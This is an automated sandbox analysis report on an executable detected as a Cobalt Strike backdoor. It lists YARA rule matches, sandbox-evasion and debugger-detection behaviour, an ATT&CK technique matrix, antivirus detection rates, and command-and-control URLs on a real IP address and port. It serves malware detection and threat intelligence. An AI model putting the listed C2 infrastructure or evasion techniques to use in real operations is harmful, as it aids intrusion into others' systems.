          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@0/1
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_007C0B70
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C3A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,0_2_007C3A64
          Source: A1E0xfcSNl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: A1E0xfcSNl.exeReversingLabs: Detection: 84%
          Source: A1E0xfcSNl.exeVirustotal: Detection: 79%
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: cryptnet.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007BD83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_007BD83C
          Source: A1E0xfcSNl.exeStatic PE information: section name: .xdata
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0079776C push 0000006Ah; retf 0_2_00797784
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007E916C push 0000006Ah; retf 0_2_007E9184
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D01A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007D01A8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior

          Malware Analysis System Evasion

          barindex
          Contains functionality to detect sleep reduction / modifications
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C58540_2_007C5854
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007BFA1C0_2_007BFA1C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeWindow / User API: threadDelayed 6393Jump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeWindow / User API: threadDelayed 3234Jump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-37777
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-37920
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeAPI coverage: 6.6 %
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007BFA1C0_2_007BFA1C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7424Thread sleep count: 6393 > 30Jump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7424Thread sleep time: -63930000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7436Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7424Thread sleep count: 3234 > 30Jump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7424Thread sleep time: -32340000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_007C9220
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_007C1C30
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeThread delayed: delay time: 60000Jump to behavior
          Source: A1E0xfcSNl.exe, 00000000.00000003.1787137011.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2769115094.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756222341.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756717399.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeAPI call chain: ExitProcess graph end nodegraph_0-37851

          Anti Debugging

          barindex
          Found API chain indicative of debugger detection
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-37496
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007DF810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,0_2_007DF810
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_007D9744
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007BD83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_007BD83C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007DC0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock,0_2_007DC0C8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00401180
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_00402F62 SetUnhandledExceptionFilter,0_2_00402F62
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A70
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_004542E4 SetUnhandledExceptionFilter,0_2_004542E4
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007E24F0 SetUnhandledExceptionFilter,0_2_007E24F0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D44D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007D44D0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007CDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_007CDF50
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007E2050 AllocateAndInitializeSid,0_2_007E2050
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00401990
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_007C5E28
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_007C5E28
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Remote Access Functionality

          barindex
          Yara detected CobaltStrike
          Source: Yara matchFile source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C6A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_007C6A78
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C6670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_007C6670
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007E2630 bind,0_2_007E2630
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007CEE8C socket,closesocket,htons,bind,listen,0_2_007CEE8C

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		2
          Valid Accounts          		2
          Valid Accounts          		2
          Valid Accounts          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		21
          Access Token Manipulation          		111
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Query Registry          		Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Process Injection          		21
          Access Token Manipulation          		Security Account Manager241
          Security Software Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading          		1
          Process Injection          		NTDS111
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture1
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Account Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Owner/User Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          File and Directory Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing4
          System Information Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          A1E0xfcSNl.exe84%ReversingLabsWin64.Backdoor.CobaltStrike
          A1E0xfcSNl.exe79%VirustotalBrowse
          A1E0xfcSNl.exe100%AviraHEUR/AGEN.1344321
          A1E0xfcSNl.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://89.197.154.116:7810/en_US/all.jsM920%VirustotalBrowse
          https://89.197.154.116:7810/dll20%VirustotalBrowse
          https://89.197.154.116:7810/en_US/all.jshic21%VirustotalBrowse
          https://89.197.154.116:7810/en_US/all.jsZ021%VirustotalBrowse
          https://89.197.154.116:7810/6%VirustotalBrowse
          https://89.197.154.116:7810/l20%VirustotalBrowse
          https://89.197.154.116:7810/.net21%VirustotalBrowse
          https://89.197.154.116:7810//6%VirustotalBrowse
          https://89.197.154.116:7810/en_US/all.jsom20%VirustotalBrowse
          https://89.197.154.116:7810/en_US/all.js22%VirustotalBrowse
          https://89.197.154.116/21%VirustotalBrowse
          89.197.154.11623%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          89.197.154.116trueunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://89.197.154.116:7810/dllA1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://89.197.154.116:7810/en_US/all.jshicA1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2709742244.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564242417.00000000039A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564344046.00000000039CD000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2573493710.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2563680413.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://89.197.154.116:7810/llaA1E0xfcSNl.exe, 00000000.00000003.2587345424.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://89.197.154.116:7810/en_US/all.js4A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008CA000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://89.197.154.116:7810/m/JA1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://89.197.154.116:7810/A1E0xfcSNl.exe, 00000000.00000003.2612763222.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2575316910.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://89.197.154.116:7810/en_US/all.jsM9A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2598576195.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2662520472.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2769115094.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744289857.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756222341.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2855323562.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2663639953.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756717399.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2853918191.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2709742244.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://89.197.154.116:7810/en_US/all.jsG2A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008C8000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://89.197.154.116:7810/.netA1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://89.197.154.116:7810/en_US/all.jsomsA1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://89.197.154.116:7810/en_US/all.jsZ0A1E0xfcSNl.exe, 00000000.00000003.2879314585.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008CA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://89.197.154.116:7810/lA1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://89.197.154.116:7810//A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://89.197.154.116:7810/en_US/all.jsbA1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
